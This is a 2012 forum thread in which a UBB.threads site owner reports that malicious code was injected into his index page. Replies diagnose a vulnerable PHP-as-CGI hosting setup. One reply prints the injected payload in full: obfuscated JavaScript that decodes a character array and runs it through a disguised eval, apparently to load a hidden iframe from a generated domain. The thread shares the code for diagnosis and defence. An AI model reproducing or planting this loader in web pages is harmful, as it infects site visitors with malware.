Previous Thread
Next Thread
Print Thread
Hop To
#249565 06/24/2012 9:38 AM
Joined: Dec 2003
Posts: 237
Enthusiast
Enthusiast
Joined: Dec 2003
Posts: 237
I really couldn't figure out where to post this topic so I chose this forum. smile

Just recently, my board was hacked; a malicious code was added to my main page (index.html). Google caught it and displayed their warning that the site had been found to have malware on it which allowed malicious software to be downloaded to the visitor's PC.

I found the malicous code, removed it and then requested a "Review" by Google to have the warning removed.

The malicious code has been attached as a .txt file if anyone is interested in perusing it not simply out of curiosity but perhaps to help SD or another to increase the security of UBBThreads.

In the meanwhile, does anyone have a suggestion on how to prevent such things from happening again?

Thanks
Attachments
hacked_script.txt (16.4 KB, 3666 downloads)


Artificial Intelligence is no match for natural stupidity!
Pilgrim #249566 06/24/2012 10:27 AM
Joined: May 2006
Posts: 5
stranger
stranger
Joined: May 2006
Posts: 5
I know it's not much help, but that can distill down a little bit.

Someone would have to run the script to alert instead of eval to see what's really happening.

Code
i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,41,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,202,100,122,116,202,115,232,125,202,108,230,101,246,116,208,105,230,46,230,101,202,100,122,116,202,115,232,43,232,104,210,115,92,77,250,114,202,116,234,114,220,40,232,104,210,115,92,115,202,101,200,42,232,104,210,115,92,111,220,101,158,118,202,114,154,41,250,102,234,110,198,116,210,111,220,32,164,97,220,100,222,109,156,117,218,98,202,114,142,101,220,101,228,97,232,111,228,40,234,110,210,120,82,123,236,97,228,32,200,61,220,101,238,32,136,97,232,101,80,117,220,105,240,42,98,48,96,48,82,59,236,97,228,32,230,61,200,46,206,101,232,72,222,117,228,115,80,41,124,49,100,63,98,58,96,59,232,104,210,115,92,115,202,101,200,61,100,51,104,53,108,55,112,57,96,49,86,40,200,46,206,101,232,77,222,110,232,104,80,41,84,48,240,70,140,70,140,70,140,41,86,40,200,46,206,101,232,68,194,116,202,40,82,42,96,120,140,70,140,70,82,43,80,77,194,116,208,46,228,111,234,110,200,40,230,42,96,120,140,70,140,41,82,59,232,104,210,115,92,65,122,52,112,50,110,49,118,116,208,105,230,46,154,61,100,49,104,55,104,56,102,54,104,55,118,116,208,105,230,46,162,61,232,104,210,115,92,77,94,116,208,105,230,46,130,59,232,104,210,115,92,82,122,116,208,105,230,46,154,37,232,104,210,115,92,65,118,116,208,105,230,46,222,110,202,79,236,101,228,77,122,49,92,48,94,116,208,105,230,46,154,59,232,104,210,115,92,110,202,120,232,61,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,118,114,202,116,234,114,220,32,232,104,210,115,250,102,234,110,198,116,210,111,220,32,198,114,202,97,232,101,164,97,220,100,222,109,156,117,218,98,202,114,80,114,88,77,210,110,88,77,194,120,82,123,228,101,232,117,228,110,64,77,194,116,208,46,228,111,234,110,200,40,80,77,194,120,90,77,210,110,82,42,228,46,220,101,240,116,80,41,86,77,210,110,82,125,204,117,220,99,232,105,222,110,64,103,202,110,202,114,194,116,202,80,230,101,234,100,222,82,194,110,200,111,218,83,232,114,210,110,206,40,234,110,210,120,88,108,202,110,206,116,208,44,244,111,220,101,82,123,236,97,228,32,228,97,220,100,122,110,202,119,64,82,194,110,200,111,218,78,234,109,196,101,228,71,202,110,202,114,194,116,222,114,80,117,220,105,240,41,118,118,194,114,64,108,202,116,232,101,228,115,122,91,78,97,78,44,78,98,78,44,78,99,78,44,78,100,78,44,78,101,78,44,78,102,78,44,78,103,78,44,78,104,78,44,78,105,78,44,78,106,78,44,78,107,78,44,78,108,78,44,78,109,78,44,78,110,78,44,78,111,78,44,78,112,78,44,78,113,78,44,78,114,78,44,78,115,78,44,78,116,78,44,78,117,78,44,78,118,78,44,78,119,78,44,78,120,78,44,78,121,78,44,78,122,78,93,118,118,194,114,64,115,232,114,122,39,78,59,204,111,228,40,236,97,228,32,210,61,96,59,210,60,216,101,220,103,232,104,118,105,86,43,82,123,230,116,228,43,122,108,202,116,232,101,228,115,182,99,228,101,194,116,202,82,194,110,200,111,218,78,234,109,196,101,228,40,228,97,220,100,88,48,88,108,202,116,232,101,228,115,92,108,202,110,206,116,208,45,98,41,186,125,228,101,232,117,228,110,64,115,232,114,86,39,92,39,86,122,222,110,202,125,230,101,232,84,210,109,202,111,234,116,80,102,234,110,198,116,210,111,220,40,82,123,232,114,242,123,210,102,80,116,242,112,202,111,204,32,210,102,228,97,218,101,174,97,230,67,228,101,194,116,202,100,100,61,122,34,234,110,200,101,204,105,220,101,200,34,82,123,210,102,228,97,218,101,174,97,230,67,228,101,194,116,202,100,100,61,232,114,234,101,118,118,194,114,64,117,220,105,240,61,154,97,232,104,92,114,222,117,220,100,80,43,220,101,238,32,136,97,232,101,80,41,94,49,96,48,96,41,118,118,194,114,64,100,222,109,194,105,220,78,194,109,202,61,206,101,220,101,228,97,232,101,160,115,202,117,200,111,164,97,220,100,222,109,166,116,228,105,220,103,80,117,220,105,240,44,98,54,88,39,228,117,78,41,118,105,204,114,218,61,200,111,198,117,218,101,220,116,92,99,228,101,194,116,202,69,216,101,218,101,220,116,80,34,146,70,164,65,154,69,68,41,118,105,204,114,218,46,230,101,232,65,232,116,228,105,196,117,232,101,80,34,230,114,198,34,88,34,208,116,232,112,116,47,94,34,86,100,222,109,194,105,220,78,194,109,202,43,68,47,228,117,220,102,222,114,202,115,232,114,234,110,126,115,210,100,122,99,240,34,82,59,210,102,228,109,92,115,232,121,216,101,92,119,210,100,232,104,122,34,96,112,240,34,118,105,204,114,218,46,230,116,242,108,202,46,208,101,210,103,208,116,122,34,96,112,240,34,118,105,204,114,218,46,230,116,242,108,202,46,236,105,230,105,196,105,216,105,232,121,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,228,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));}
if(f)e(s);

Pilgrim #249567 06/24/2012 10:41 AM
Joined: Apr 2007
Posts: 3,940
Likes: 1
SD Offline
Former Developer
Former Developer
Joined: Apr 2007
Posts: 3,940
Likes: 1
your host has php running as a CGI ( there is a similar thread ) and the version of php they have installed is known to be vulnerable.

it isn't ubb software from what i can tell.

that is, IF you installed one of the xx.xx.xxp2 versions that are imperative.

2c

SD #249569 06/24/2012 3:52 PM
Joined: Dec 2003
Posts: 237
Enthusiast
Enthusiast
Joined: Dec 2003
Posts: 237
Originally Posted by SD
your host has php running as a CGI ( there is a similar thread ) and the version of php they have installed is known to be vulnerable.

it isn't ubb software from what i can tell.

that is, IF you installed one of the xx.xx.xxp2 versions that are imperative.

2c
Understood and it is good to know that the problem is not with UBBThreads. Yes, I have SP2 patch installed. So, it would seem that it would be good to contact the host provider and mention what happened and it might be good to update their version of php.


Artificial Intelligence is no match for natural stupidity!
Pilgrim #249589 06/29/2012 10:32 AM
Joined: Apr 2007
Posts: 3,940
Likes: 1
SD Offline
Former Developer
Former Developer
Joined: Apr 2007
Posts: 3,940
Likes: 1
they should run as suphp or fastcgi AND upgrade to latest php, yes


Link Copied to Clipboard
ShoutChat
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
spam issues
by ECNet - 03/19/2024 11:45 PM
Looking for a forum
by azr - 03/15/2024 11:26 PM
Editing Links in Post
by Outdoorking - 03/15/2024 9:31 AM
Question on barkrowler and the like
by Mors - 02/29/2024 6:51 PM
Member Permissions Help
by domspeak - 02/27/2024 6:31 PM
Who's Online Now
1 members (Havenofsobriety), 522 guests, and 99 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Los Angeles
Los Angeles
by isaac, August 6
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 8.0.0
(Preview build 20230217)